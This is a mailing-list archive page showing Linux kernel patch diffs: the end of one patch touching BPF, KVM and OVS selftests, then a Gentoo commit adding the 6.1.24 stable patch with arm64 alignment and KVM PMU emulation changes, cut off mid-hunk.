+diff --git a/tools/testing/selftests/bpf/progs/find_vma_fail1.c b/tools/testing/selftests/bpf/progs/find_vma_fail1.c
+index b3b326b8e2d1c..6dab9cffda132 100644
+--- a/tools/testing/selftests/bpf/progs/find_vma_fail1.c
++++ b/tools/testing/selftests/bpf/progs/find_vma_fail1.c
+@@ -2,6 +2,7 @@
+ /* Copyright (c) 2021 Facebook */
+ #include "vmlinux.h"
+ #include <bpf/bpf_helpers.h>
++#define vm_flags vm_start
+ 
+ char _license[] SEC("license") = "GPL";
+ 
+diff --git a/tools/testing/selftests/kvm/include/x86_64/svm.h b/tools/testing/selftests/kvm/include/x86_64/svm.h
+index c8343ff84f7f7..483e6ae12f69e 100644
+--- a/tools/testing/selftests/kvm/include/x86_64/svm.h
++++ b/tools/testing/selftests/kvm/include/x86_64/svm.h
+@@ -58,6 +58,23 @@ enum {
+ 	INTERCEPT_RDPRU,
+ };
+ 
++struct hv_vmcb_enlightenments {
++	struct __packed hv_enlightenments_control {
++		u32 nested_flush_hypercall:1;
++		u32 msr_bitmap:1;
++		u32 enlightened_npt_tlb: 1;
++		u32 reserved:29;
++	} __packed hv_enlightenments_control;
++	u32 hv_vp_id;
++	u64 hv_vm_id;
++	u64 partition_assist_page;
++	u64 reserved;
++} __packed;
++
++/*
++ * Hyper-V uses the software reserved clean bit in VMCB
++ */
++#define HV_VMCB_NESTED_ENLIGHTENMENTS (1U << 31)
+ 
+ struct __attribute__ ((__packed__)) vmcb_control_area {
+ 	u32 intercept_cr;
+@@ -106,7 +123,10 @@ struct __attribute__ ((__packed__)) vmcb_control_area {
+ 	 * Offset 0x3e0, 32 bytes reserved
+ 	 * for use by hypervisor/software.
+ 	 */
+-	u8 reserved_sw[32];
++	union {
++		struct hv_vmcb_enlightenments hv_enlightenments;
++		u8 reserved_sw[32];
++	};
+ };
+ 
+ 
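
The svm.h hunk overlays a typed struct hv_vmcb_enlightenments on the 32-byte software-reserved window of the VMCB control area through an anonymous union, so tests can name the Hyper-V fields instead of casting reserved_sw. A compact sketch of the overlay-plus-size-check pattern; the field layout is abbreviated (the real struct begins with a packed bitfield control word), so treat the names as placeholders.

#include <stdint.h>
#include <stdio.h>

struct hv_bits {
	uint32_t vp_id;
	uint64_t vm_id;
	uint64_t partition_assist_page;
	uint64_t reserved;
} __attribute__((packed));

/* Overlay a typed view on a software-reserved byte range. */
struct control_area {
	uint32_t intercepts;	/* stand-in for the preceding fields */
	union {
		struct hv_bits hv;
		uint8_t reserved_sw[32];
	};
} __attribute__((packed));

_Static_assert(sizeof(struct hv_bits) <= 32,
	       "typed view must fit the reserved window");

int main(void)
{
	struct control_area c = { 0 };

	c.hv.vp_id = 42;
	/* On little-endian, byte 0 is the low byte of vp_id. */
	printf("byte0=%u hv_bits=%zu bytes\n",
	       c.reserved_sw[0], sizeof(struct hv_bits));
	return 0;
}
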
+diff --git a/tools/testing/selftests/kvm/x86_64/hyperv_svm_test.c b/tools/testing/selftests/kvm/x86_64/hyperv_svm_test.c
+index a380ad7bb9b34..1c3fc38b4f151 100644
+--- a/tools/testing/selftests/kvm/x86_64/hyperv_svm_test.c
++++ b/tools/testing/selftests/kvm/x86_64/hyperv_svm_test.c
+@@ -23,24 +23,6 @@
+ 
+ #define L2_GUEST_STACK_SIZE 256
+ 
+-struct hv_enlightenments {
+-	struct __packed hv_enlightenments_control {
+-		u32 nested_flush_hypercall:1;
+-		u32 msr_bitmap:1;
+-		u32 enlightened_npt_tlb: 1;
+-		u32 reserved:29;
+-	} __packed hv_enlightenments_control;
+-	u32 hv_vp_id;
+-	u64 hv_vm_id;
+-	u64 partition_assist_page;
+-	u64 reserved;
+-} __packed;
+-
+-/*
+- * Hyper-V uses the software reserved clean bit in VMCB
+- */
+-#define VMCB_HV_NESTED_ENLIGHTENMENTS (1U << 31)
+-
+ void l2_guest_code(void)
+ {
+ 	GUEST_SYNC(3);
+@@ -64,8 +46,7 @@ static void __attribute__((__flatten__)) guest_code(struct svm_test_data *svm)
+ {
+ 	unsigned long l2_guest_stack[L2_GUEST_STACK_SIZE];
+ 	struct vmcb *vmcb = svm->vmcb;
+-	struct hv_enlightenments *hve =
+-		(struct hv_enlightenments *)vmcb->control.reserved_sw;
++	struct hv_vmcb_enlightenments *hve = &vmcb->control.hv_enlightenments;
+ 
+ 	GUEST_SYNC(1);
+ 
+@@ -98,14 +79,14 @@ static void __attribute__((__flatten__)) guest_code(struct svm_test_data *svm)
+ 	/* Intercept RDMSR 0xc0000101 without telling KVM about it */
+ 	set_bit(2 * (MSR_GS_BASE & 0x1fff), svm->msr + 0x800);
+ 	/* Make sure HV_VMX_ENLIGHTENED_CLEAN_FIELD_MSR_BITMAP is set */
+-	vmcb->control.clean |= VMCB_HV_NESTED_ENLIGHTENMENTS;
++	vmcb->control.clean |= HV_VMCB_NESTED_ENLIGHTENMENTS;
+ 	run_guest(vmcb, svm->vmcb_gpa);
+ 	/* Make sure we don't see SVM_EXIT_MSR here so eMSR bitmap works */
+ 	GUEST_ASSERT(vmcb->control.exit_code == SVM_EXIT_VMMCALL);
+ 	vmcb->save.rip += 3; /* vmcall */
+ 
+ 	/* Now tell KVM we've changed MSR-Bitmap */
+-	vmcb->control.clean &= ~VMCB_HV_NESTED_ENLIGHTENMENTS;
++	vmcb->control.clean &= ~HV_VMCB_NESTED_ENLIGHTENMENTS;
+ 	run_guest(vmcb, svm->vmcb_gpa);
+ 	GUEST_ASSERT(vmcb->control.exit_code == SVM_EXIT_MSR);
+ 	vmcb->save.rip += 2; /* rdmsr */
+diff --git a/tools/testing/selftests/net/openvswitch/ovs-dpctl.py b/tools/testing/selftests/net/openvswitch/ovs-dpctl.py
+index 3243c90d449e6..5d467d1993cb1 100644
+--- a/tools/testing/selftests/net/openvswitch/ovs-dpctl.py
++++ b/tools/testing/selftests/net/openvswitch/ovs-dpctl.py
+@@ -62,7 +62,7 @@ class OvsDatapath(GenericNetlinkSocket):
+         nla_map = (
+             ("OVS_DP_ATTR_UNSPEC", "none"),
+             ("OVS_DP_ATTR_NAME", "asciiz"),
+-            ("OVS_DP_ATTR_UPCALL_PID", "uint32"),
++            ("OVS_DP_ATTR_UPCALL_PID", "array(uint32)"),
+             ("OVS_DP_ATTR_STATS", "dpstats"),
+             ("OVS_DP_ATTR_MEGAFLOW_STATS", "megaflowstats"),
+             ("OVS_DP_ATTR_USER_FEATURES", "uint32"),


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-04-13 16:09 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-04-13 16:09 UTC (permalink / raw
  To: gentoo-commits

commit:     ca7e265c42f5d0ef307cd4e76877fd77b86dae6c
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Thu Apr 13 16:09:19 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Thu Apr 13 16:09:19 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=ca7e265c

Linux patch 6.1.24

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |     4 +
 1023_linux-6.1.24.patch | 14535 ++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 14539 insertions(+)

diff --git a/0000_README b/0000_README
index 82189ada..ef975a1f 100644
--- a/0000_README
+++ b/0000_README
@@ -135,6 +135,10 @@ Patch:  1022_linux-6.1.23.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.23
 
+Patch:  1023_linux-6.1.24.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.24
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1023_linux-6.1.24.patch b/1023_linux-6.1.24.patch
new file mode 100644
index 00000000..546adf85
--- /dev/null
+++ b/1023_linux-6.1.24.patch
@@ -0,0 +1,14535 @@
+diff --git a/Documentation/devicetree/bindings/serial/renesas,scif.yaml b/Documentation/devicetree/bindings/serial/renesas,scif.yaml
+index f930e7f1349fc..52c0948738637 100644
+--- a/Documentation/devicetree/bindings/serial/renesas,scif.yaml
++++ b/Documentation/devicetree/bindings/serial/renesas,scif.yaml
+@@ -91,7 +91,7 @@ properties:
+           - description: Error interrupt
+           - description: Receive buffer full interrupt
+           - description: Transmit buffer empty interrupt
+-          - description: Transmit End interrupt
++          - description: Break interrupt
+       - items:
+           - description: Error interrupt
+           - description: Receive buffer full interrupt
+@@ -106,7 +106,7 @@ properties:
+           - const: eri
+           - const: rxi
+           - const: txi
+-          - const: tei
++          - const: bri
+       - items:
+           - const: eri
+           - const: rxi
+diff --git a/Documentation/mm/zsmalloc.rst b/Documentation/mm/zsmalloc.rst
+index 6e79893d61326..d98607aa9c1fd 100644
+--- a/Documentation/mm/zsmalloc.rst
++++ b/Documentation/mm/zsmalloc.rst
+@@ -68,6 +68,8 @@ pages_used
+ 	the number of pages allocated for the class
+ pages_per_zspage
+ 	the number of 0-order pages to make a zspage
++freeable
++	the approximate number of pages class compaction can free
+ 
+ We assign a zspage to ZS_ALMOST_EMPTY fullness group when n <= N / f, where
+ 
+diff --git a/Makefile b/Makefile
+index a162f6cdf77c6..4f9939dec2c26 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 23
++SUBLEVEL = 24
+ EXTRAVERSION =
+ NAME = Hurr durr I'ma ninja sloth
+ 
+diff --git a/arch/arm64/kernel/compat_alignment.c b/arch/arm64/kernel/compat_alignment.c
+index 5edec2f49ec98..deff21bfa6800 100644
+--- a/arch/arm64/kernel/compat_alignment.c
++++ b/arch/arm64/kernel/compat_alignment.c
+@@ -314,36 +314,32 @@ int do_compat_alignment_fixup(unsigned long addr, struct pt_regs *regs)
+ 	int (*handler)(unsigned long addr, u32 instr, struct pt_regs *regs);
+ 	unsigned int type;
+ 	u32 instr = 0;
+-	u16 tinstr = 0;
+ 	int isize = 4;
+ 	int thumb2_32b = 0;
+-	int fault;
+ 
+ 	instrptr = instruction_pointer(regs);
+ 
+ 	if (compat_thumb_mode(regs)) {
+ 		__le16 __user *ptr = (__le16 __user *)(instrptr & ~1);
++		u16 tinstr, tinst2;
+ 
+-		fault = alignment_get_thumb(regs, ptr, &tinstr);
+-		if (!fault) {
+-			if (IS_T32(tinstr)) {
+-				/* Thumb-2 32-bit */
+-				u16 tinst2;
+-				fault = alignment_get_thumb(regs, ptr + 1, &tinst2);
+-				instr = ((u32)tinstr << 16) | tinst2;
+-				thumb2_32b = 1;
+-			} else {
+-				isize = 2;
+-				instr = thumb2arm(tinstr);
+-			}
++		if (alignment_get_thumb(regs, ptr, &tinstr))
++			return 1;
++
++		if (IS_T32(tinstr)) { /* Thumb-2 32-bit */
++			if (alignment_get_thumb(regs, ptr + 1, &tinst2))
++				return 1;
++			instr = ((u32)tinstr << 16) | tinst2;
++			thumb2_32b = 1;
++		} else {
++			isize = 2;
++			instr = thumb2arm(tinstr);
+ 		}
+ 	} else {
+-		fault = alignment_get_arm(regs, (__le32 __user *)instrptr, &instr);
++		if (alignment_get_arm(regs, (__le32 __user *)instrptr, &instr))
++			return 1;
+ 	}
+ 
+-	if (fault)
+-		return 1;
+-
+ 	switch (CODING_BITS(instr)) {
+ 	case 0x00000000:	/* 3.13.4 load/store instruction extensions */
+ 		if (LDSTHD_I_BIT(instr))
+diff --git a/arch/arm64/kvm/pmu-emul.c b/arch/arm64/kvm/pmu-emul.c
+index 0003c7d37533a..67770375c5eed 100644
+--- a/arch/arm64/kvm/pmu-emul.c
++++ b/arch/arm64/kvm/pmu-emul.c
+@@ -15,16 +15,14 @@
+ #include <kvm/arm_pmu.h>
+ #include <kvm/arm_vgic.h>
+ 
++#define PERF_ATTR_CFG1_COUNTER_64BIT	BIT(0)
++
+ DEFINE_STATIC_KEY_FALSE(kvm_arm_pmu_available);
+ 
+ static LIST_HEAD(arm_pmus);
+ static DEFINE_MUTEX(arm_pmus_lock);
+ 
+ static void kvm_pmu_create_perf_event(struct kvm_vcpu *vcpu, u64 select_idx);
+-static void kvm_pmu_update_pmc_chained(struct kvm_vcpu *vcpu, u64 select_idx);
+-static void kvm_pmu_stop_counter(struct kvm_vcpu *vcpu, struct kvm_pmc *pmc);
+-
+-#define PERF_ATTR_CFG1_KVM_PMU_CHAINED 0x1
+ 
+ static u32 kvm_pmu_event_mask(struct kvm *kvm)
+ {
+@@ -52,11 +50,22 @@ static u32 kvm_pmu_event_mask(struct kvm *kvm)
+  * @select_idx: The counter index
+  */
+ static bool kvm_pmu_idx_is_64bit(struct kvm_vcpu *vcpu, u64 select_idx)
++{
++	return (select_idx == ARMV8_PMU_CYCLE_IDX);
++}
++
++static bool kvm_pmu_idx_has_64bit_overflow(struct kvm_vcpu *vcpu, u64 select_idx)
+ {
+ 	return (select_idx == ARMV8_PMU_CYCLE_IDX &&
+ 		__vcpu_sys_reg(vcpu, PMCR_EL0) & ARMV8_PMU_PMCR_LC);
+ }
+ 
++static bool kvm_pmu_counter_can_chain(struct kvm_vcpu *vcpu, u64 idx)
++{
++	return (!(idx & 1) && (idx + 1) < ARMV8_PMU_CYCLE_IDX &&
++		!kvm_pmu_idx_has_64bit_overflow(vcpu, idx));
++}
++
+ static struct kvm_vcpu *kvm_pmc_to_vcpu(struct kvm_pmc *pmc)
+ {
+ 	struct kvm_pmu *pmu;
+@@ -69,91 +78,22 @@ static struct kvm_vcpu *kvm_pmc_to_vcpu(struct kvm_pmc *pmc)
+ }
+ 
+ /**
+- * kvm_pmu_pmc_is_chained - determine if the pmc is chained
+- * @pmc: The PMU counter pointer
+- */
+-static bool kvm_pmu_pmc_is_chained(struct kvm_pmc *pmc)
+-{
+-	struct kvm_vcpu *vcpu = kvm_pmc_to_vcpu(pmc);
+-
+-	return test_bit(pmc->idx >> 1, vcpu->arch.pmu.chained);
+-}
+-
+-/**
+- * kvm_pmu_idx_is_high_counter - determine if select_idx is a high/low counter
+- * @select_idx: The counter index
+- */
+-static bool kvm_pmu_idx_is_high_counter(u64 select_idx)
+-{
+-	return select_idx & 0x1;
+-}
+-
+-/**
+- * kvm_pmu_get_canonical_pmc - obtain the canonical pmc
+- * @pmc: The PMU counter pointer
+- *
+- * When a pair of PMCs are chained together we use the low counter (canonical)
+- * to hold the underlying perf event.
+- */
+-static struct kvm_pmc *kvm_pmu_get_canonical_pmc(struct kvm_pmc *pmc)
+-{
+-	if (kvm_pmu_pmc_is_chained(pmc) &&
+-	    kvm_pmu_idx_is_high_counter(pmc->idx))
+-		return pmc - 1;
+-
+-	return pmc;
+-}
+-static struct kvm_pmc *kvm_pmu_get_alternate_pmc(struct kvm_pmc *pmc)
+-{
+-	if (kvm_pmu_idx_is_high_counter(pmc->idx))
+-		return pmc - 1;
+-	else
+-		return pmc + 1;
+-}
+-
+-/**
+- * kvm_pmu_idx_has_chain_evtype - determine if the event type is chain
++ * kvm_pmu_get_counter_value - get PMU counter value
+  * @vcpu: The vcpu pointer
+  * @select_idx: The counter index
+  */
+-static bool kvm_pmu_idx_has_chain_evtype(struct kvm_vcpu *vcpu, u64 select_idx)
+-{
+-	u64 eventsel, reg;
+-
+-	select_idx |= 0x1;
+-
+-	if (select_idx == ARMV8_PMU_CYCLE_IDX)
+-		return false;
+-
+-	reg = PMEVTYPER0_EL0 + select_idx;
+-	eventsel = __vcpu_sys_reg(vcpu, reg) & kvm_pmu_event_mask(vcpu->kvm);
+-
+-	return eventsel == ARMV8_PMUV3_PERFCTR_CHAIN;
+-}
+-
+-/**
+- * kvm_pmu_get_pair_counter_value - get PMU counter value
+- * @vcpu: The vcpu pointer
+- * @pmc: The PMU counter pointer
+- */
+-static u64 kvm_pmu_get_pair_counter_value(struct kvm_vcpu *vcpu,
+-					  struct kvm_pmc *pmc)
++u64 kvm_pmu_get_counter_value(struct kvm_vcpu *vcpu, u64 select_idx)
+ {
+-	u64 counter, counter_high, reg, enabled, running;
+-
+-	if (kvm_pmu_pmc_is_chained(pmc)) {
+-		pmc = kvm_pmu_get_canonical_pmc(pmc);
+-		reg = PMEVCNTR0_EL0 + pmc->idx;
++	u64 counter, reg, enabled, running;
++	struct kvm_pmu *pmu = &vcpu->arch.pmu;
++	struct kvm_pmc *pmc = &pmu->pmc[select_idx];
+ 
+-		counter = __vcpu_sys_reg(vcpu, reg);
+-		counter_high = __vcpu_sys_reg(vcpu, reg + 1);
++	if (!kvm_vcpu_has_pmu(vcpu))
++		return 0;
+ 
+-		counter = lower_32_bits(counter) | (counter_high << 32);
+-	} else {
+-		reg = (pmc->idx == ARMV8_PMU_CYCLE_IDX)
+-		      ? PMCCNTR_EL0 : PMEVCNTR0_EL0 + pmc->idx;
+-		counter = __vcpu_sys_reg(vcpu, reg);
+-	}
++	reg = (pmc->idx == ARMV8_PMU_CYCLE_IDX)
++		? PMCCNTR_EL0 : PMEVCNTR0_EL0 + pmc->idx;
++	counter = __vcpu_sys_reg(vcpu, reg);
+ 
+ 	/*
+ 	 * The real counter value is equal to the value of counter register plus
+@@ -163,29 +103,7 @@ static u64 kvm_pmu_get_pair_counter_value(struct kvm_vcpu *vcpu,
+ 		counter += perf_event_read_value(pmc->perf_event, &enabled,
+ 						 &running);
+ 
+-	return counter;
+-}
+-
+-/**
+- * kvm_pmu_get_counter_value - get PMU counter value
+- * @vcpu: The vcpu pointer
+- * @select_idx: The counter index
+- */
+-u64 kvm_pmu_get_counter_value(struct kvm_vcpu *vcpu, u64 select_idx)
+-{
+-	u64 counter;
+-	struct kvm_pmu *pmu = &vcpu->arch.pmu;
+-	struct kvm_pmc *pmc = &pmu->pmc[select_idx];
+-
+-	if (!kvm_vcpu_has_pmu(vcpu))
+-		return 0;
+-
+-	counter = kvm_pmu_get_pair_counter_value(vcpu, pmc);
+-
+-	if (kvm_pmu_pmc_is_chained(pmc) &&
+-	    kvm_pmu_idx_is_high_counter(select_idx))
+-		counter = upper_32_bits(counter);
+-	else if (select_idx != ARMV8_PMU_CYCLE_IDX)
++	if (!kvm_pmu_idx_is_64bit(vcpu, select_idx))
+ 		counter = lower_32_bits(counter);
+ 
+ 	return counter;
+@@ -218,7 +136,6 @@ void kvm_pmu_set_counter_value(struct kvm_vcpu *vcpu, u64 select_idx, u64 val)
+  */
+ static void kvm_pmu_release_perf_event(struct kvm_pmc *pmc)
+ {
+-	pmc = kvm_pmu_get_canonical_pmc(pmc);
+ 	if (pmc->perf_event) {
+ 		perf_event_disable(pmc->perf_event);
+ 		perf_event_release_kernel(pmc->perf_event);
+@@ -236,11 +153,10 @@ static void kvm_pmu_stop_counter(struct kvm_vcpu *vcpu, struct kvm_pmc *pmc)
+ {
+ 	u64 counter, reg, val;
+ 
+-	pmc = kvm_pmu_get_canonical_pmc(pmc);
+ 	if (!pmc->perf_event)
+ 		return;
+ 
+-	counter = kvm_pmu_get_pair_counter_value(vcpu, pmc);
++	counter = kvm_pmu_get_counter_value(vcpu, pmc->idx);
+ 
+ 	if (pmc->idx == ARMV8_PMU_CYCLE_IDX) {
+ 		reg = PMCCNTR_EL0;
+@@ -252,9 +168,6 @@ static void kvm_pmu_stop_counter(struct kvm_vcpu *vcpu, struct kvm_pmc *pmc)
+ 
+ 	__vcpu_sys_reg(vcpu, reg) = val;
+ 
+-	if (kvm_pmu_pmc_is_chained(pmc))
+-		__vcpu_sys_reg(vcpu, reg + 1) = upper_32_bits(counter);
+-
+ 	kvm_pmu_release_perf_event(pmc);
+ }
+ 
+@@ -285,8 +198,6 @@ void kvm_pmu_vcpu_reset(struct kvm_vcpu *vcpu)
+ 
+ 	for_each_set_bit(i, &mask, 32)
+ 		kvm_pmu_stop_counter(vcpu, &pmu->pmc[i]);
+-
+-	bitmap_zero(vcpu->arch.pmu.chained, ARMV8_PMU_MAX_COUNTER_PAIRS);
+ }
+ 
+ /**
+@@ -340,12 +251,9 @@ void kvm_pmu_enable_counter_mask(struct kvm_vcpu *vcpu, u64 val)
+ 
+ 		pmc = &pmu->pmc[i];
+ 
+-		/* A change in the enable state may affect the chain state */
+-		kvm_pmu_update_pmc_chained(vcpu, i);
+-		kvm_pmu_create_perf_event(vcpu, i);
+-
+-		/* At this point, pmc must be the canonical */
+-		if (pmc->perf_event) {
++		if (!pmc->perf_event) {
++			kvm_pmu_create_perf_event(vcpu, i);
++		} else {
+ 			perf_event_enable(pmc->perf_event);
+ 			if (pmc->perf_event->state != PERF_EVENT_STATE_ACTIVE)
+ 				kvm_debug("fail to enable perf event\n");
+@@ -375,11 +283,6 @@ void kvm_pmu_disable_counter_mask(struct kvm_vcpu *vcpu, u64 val)
+ 
+ 		pmc = &pmu->pmc[i];
+ 
+-		/* A change in the enable state may affect the chain state */
+-		kvm_pmu_update_pmc_chained(vcpu, i);
+-		kvm_pmu_create_perf_event(vcpu, i);
+-
+-		/* At this point, pmc must be the canonical */
+ 		if (pmc->perf_event)
+ 			perf_event_disable(pmc->perf_event);
+ 	}
+@@ -484,6 +387,65 @@ static void kvm_pmu_perf_overflow_notify_vcpu(struct irq_work *work)
+ 	kvm_vcpu_kick(vcpu);
+ }
+ 
++/*
++ * Perform an increment on any of the counters described in @mask,
++ * generating the overflow if required, and propagate it as a chained
++ * event if possible.
++ */
++static void kvm_pmu_counter_increment(struct kvm_vcpu *vcpu,
++				      unsigned long mask, u32 event)
++{
++	int i;
++
++	if (!(__vcpu_sys_reg(vcpu, PMCR_EL0) & ARMV8_PMU_PMCR_E))
++		return;
++
++	/* Weed out disabled counters */
++	mask &= __vcpu_sys_reg(vcpu, PMCNTENSET_EL0);
++
++	for_each_set_bit(i, &mask, ARMV8_PMU_CYCLE_IDX) {
++		u64 type, reg;
++
++		/* Filter on event type */
++		type = __vcpu_sys_reg(vcpu, PMEVTYPER0_EL0 + i);
++		type &= kvm_pmu_event_mask(vcpu->kvm);
++		if (type != event)
++			continue;
++
++		/* Increment this counter */
++		reg = __vcpu_sys_reg(vcpu, PMEVCNTR0_EL0 + i) + 1;
++		reg = lower_32_bits(reg);
++		__vcpu_sys_reg(vcpu, PMEVCNTR0_EL0 + i) = reg;
++
++		if (reg) /* No overflow? move on */
++			continue;
++
++		/* Mark overflow */
++		__vcpu_sys_reg(vcpu, PMOVSSET_EL0) |= BIT(i);
++
++		if (kvm_pmu_counter_can_chain(vcpu, i))
++			kvm_pmu_counter_increment(vcpu, BIT(i + 1),
++						  ARMV8_PMUV3_PERFCTR_CHAIN);
++	}
++}
++
++/* Compute the sample period for a given counter value */
++static u64 compute_period(struct kvm_vcpu *vcpu, u64 select_idx, u64 counter)
++{
++	u64 val;
++
++	if (kvm_pmu_idx_is_64bit(vcpu, select_idx)) {
++		if (!kvm_pmu_idx_has_64bit_overflow(vcpu, select_idx))
++			val = -(counter & GENMASK(31, 0));
++		else
++			val = (-counter) & GENMASK(63, 0);
++	} else {
++		val = (-counter) & GENMASK(31, 0);
++	}
++
++	return val;
++}
++
+ /**
+  * When the perf event overflows, set the overflow status and inform the vcpu.
+  */
+@@ -503,10 +465,7 @@ static void kvm_pmu_perf_overflow(struct perf_event *perf_event,
+ 	 * Reset the sample period to the architectural limit,
+ 	 * i.e. the point where the counter overflows.
+ 	 */
+-	period = -(local64_read(&perf_event->count));
+-
+-	if (!kvm_pmu_idx_is_64bit(vcpu, pmc->idx))
+-		period &= GENMASK(31, 0);
++	period = compute_period(vcpu, idx, local64_read(&perf_event->count));
+ 
+ 	local64_set(&perf_event->hw.period_left, 0);
+ 	perf_event->attr.sample_period = period;
+@@ -514,6 +473,10 @@ static void kvm_pmu_perf_overflow(struct perf_event *perf_event,
+ 
+ 	__vcpu_sys_reg(vcpu, PMOVSSET_EL0) |= BIT(idx);
+ 
++	if (kvm_pmu_counter_can_chain(vcpu, idx))
++		kvm_pmu_counter_increment(vcpu, BIT(idx + 1),
++					  ARMV8_PMUV3_PERFCTR_CHAIN);
++
+ 	if (kvm_pmu_overflow_status(vcpu)) {
+ 		kvm_make_request(KVM_REQ_IRQ_PENDING, vcpu);
+ 
+@@ -533,50 +496,7 @@ static void kvm_pmu_perf_overflow(struct perf_event *perf_event,
+  */
+ void kvm_pmu_software_increment(struct kvm_vcpu *vcpu, u64 val)
+ {
+-	struct kvm_pmu *pmu = &vcpu->arch.pmu;
+-	int i;
+-
+-	if (!kvm_vcpu_has_pmu(vcpu))
+-		return;
+-
+-	if (!(__vcpu_sys_reg(vcpu, PMCR_EL0) & ARMV8_PMU_PMCR_E))
+-		return;
+-
+-	/* Weed out disabled counters */
+-	val &= __vcpu_sys_reg(vcpu, PMCNTENSET_EL0);
+-
+-	for (i = 0; i < ARMV8_PMU_CYCLE_IDX; i++) {
+-		u64 type, reg;
+-
+-		if (!(val & BIT(i)))
+-			continue;
+-
+-		/* PMSWINC only applies to ... SW_INC! */
+-		type = __vcpu_sys_reg(vcpu, PMEVTYPER0_EL0 + i);
+-		type &= kvm_pmu_event_mask(vcpu->kvm);
+-		if (type != ARMV8_PMUV3_PERFCTR_SW_INCR)
+-			continue;
+-
+-		/* increment this even SW_INC counter */
+-		reg = __vcpu_sys_reg(vcpu, PMEVCNTR0_EL0 + i) + 1;
+-		reg = lower_32_bits(reg);
+-		__vcpu_sys_reg(vcpu, PMEVCNTR0_EL0 + i) = reg;
+-
+-		if (reg) /* no overflow on the low part */
+-			continue;
+-
+-		if (kvm_pmu_pmc_is_chained(&pmu->pmc[i])) {
+-			/* increment the high counter */
+-			reg = __vcpu_sys_reg(vcpu, PMEVCNTR0_EL0 + i + 1) + 1;
+-			reg = lower_32_bits(reg);
+-			__vcpu_sys_reg(vcpu, PMEVCNTR0_EL0 + i + 1) = reg;
+-			if (!reg) /* mark overflow on the high counter */
+-				__vcpu_sys_reg(vcpu, PMOVSSET_EL0) |= BIT(i + 1);
+-		} else {
+-			/* mark overflow on low counter */
+-			__vcpu_sys_reg(vcpu, PMOVSSET_EL0) |= BIT(i);
+-		}
+-	}
++	kvm_pmu_counter_increment(vcpu, val, ARMV8_PMUV3_PERFCTR_SW_INCR);
+ }
+ 
+ /**
+@@ -591,6 +511,9 @@ void kvm_pmu_handle_pmcr(struct kvm_vcpu *vcpu, u64 val)
+ 	if (!kvm_vcpu_has_pmu(vcpu))
+ 		return;
+ 
++	/* The reset bits don't indicate any state, and shouldn't be saved. */
++	__vcpu_sys_reg(vcpu, PMCR_EL0) = val & ~(ARMV8_PMU_PMCR_C | ARMV8_PMU_PMCR_P);
++
+ 	if (val & ARMV8_PMU_PMCR_E) {
+ 		kvm_pmu_enable_counter_mask(vcpu,
+ 		       __vcpu_sys_reg(vcpu, PMCNTENSET_EL0));
+@@ -625,18 +548,11 @@ static void kvm_pmu_create_perf_event(struct kvm_vcpu *vcpu, u64 select_idx)
+ {
+ 	struct arm_pmu *arm_pmu = vcpu->kvm->arch.arm_pmu;
+ 	struct kvm_pmu *pmu = &vcpu->arch.pmu;
+-	struct kvm_pmc *pmc;
++	struct kvm_pmc *pmc = &pmu->pmc[select_idx];
+ 	struct perf_event *event;
+ 	struct perf_event_attr attr;
+ 	u64 eventsel, counter, reg, data;
+ 
+-	/*
+-	 * For chained counters the event type and filtering attributes are
+-	 * obtained from the low/even counter. We also use this counter to
+-	 * determine if the event is enabled/disabled.
+-	 */
+-	pmc = kvm_pmu_get_canonical_pmc(&pmu->pmc[select_idx]);
+-
+ 	reg = (pmc->idx == ARMV8_PMU_CYCLE_IDX)
+ 	      ? PMCCFILTR_EL0 : PMEVTYPER0_EL0 + pmc->idx;
+ 	data = __vcpu_sys_reg(vcpu, reg);
+@@ -647,8 +563,12 @@ static void kvm_pmu_create_perf_event(struct kvm_vcpu *vcpu, u64 select_idx)
+ 	else
+ 		eventsel = data & kvm_pmu_event_mask(vcpu->kvm);
+ 
+-	/* Software increment event doesn't need to be backed by a perf event */
+-	if (eventsel == ARMV8_PMUV3_PERFCTR_SW_INCR)
++	/*
++	 * Neither SW increment nor chained events need to be backed
++	 * by a perf event.
++	 */
++	if (eventsel == ARMV8_PMUV3_PERFCTR_SW_INCR ||
++	    eventsel == ARMV8_PMUV3_PERFCTR_CHAIN)
+ 		return;
+ 
+ 	/*
+@@ -670,30 +590,20 @@ static void kvm_pmu_create_perf_event(struct kvm_vcpu *vcpu, u64 select_idx)
+ 	attr.exclude_host = 1; /* Don't count host events */
+ 	attr.config = eventsel;
+ 
+-	counter = kvm_pmu_get_pair_counter_value(vcpu, pmc);
++	counter = kvm_pmu_get_counter_value(vcpu, select_idx);
+ 
+-	if (kvm_pmu_pmc_is_chained(pmc)) {
+-		/**
+-		 * The initial sample period (overflow count) of an event. For
+-		 * chained counters we only support overflow interrupts on the
+-		 * high counter.
+-		 */
+-		attr.sample_period = (-counter) & GENMASK(63, 0);
+-		attr.config1 |= PERF_ATTR_CFG1_KVM_PMU_CHAINED;
++	/*
++	 * If counting with a 64bit counter, advertise it to the perf
++	 * code, carefully dealing with the initial sample period
++	 * which also depends on the overflow.
++	 */
++	if (kvm_pmu_idx_is_64bit(vcpu, select_idx))
++		attr.config1 |= PERF_ATTR_CFG1_COUNTER_64BIT;
+ 
+-		event = perf_event_create_kernel_counter(&attr, -1, current,
+-							 kvm_pmu_perf_overflow,
+-							 pmc + 1);
+-	} else {
+-		/* The initial sample period (overflow count) of an event. */
+-		if (kvm_pmu_idx_is_64bit(vcpu, pmc->idx))
+-			attr.sample_period = (-counter) & GENMASK(63, 0);
+-		else
+-			attr.sample_period = (-counter) & GENMASK(31, 0);
++	attr.sample_period = compute_period(vcpu, select_idx, counter);
+ 
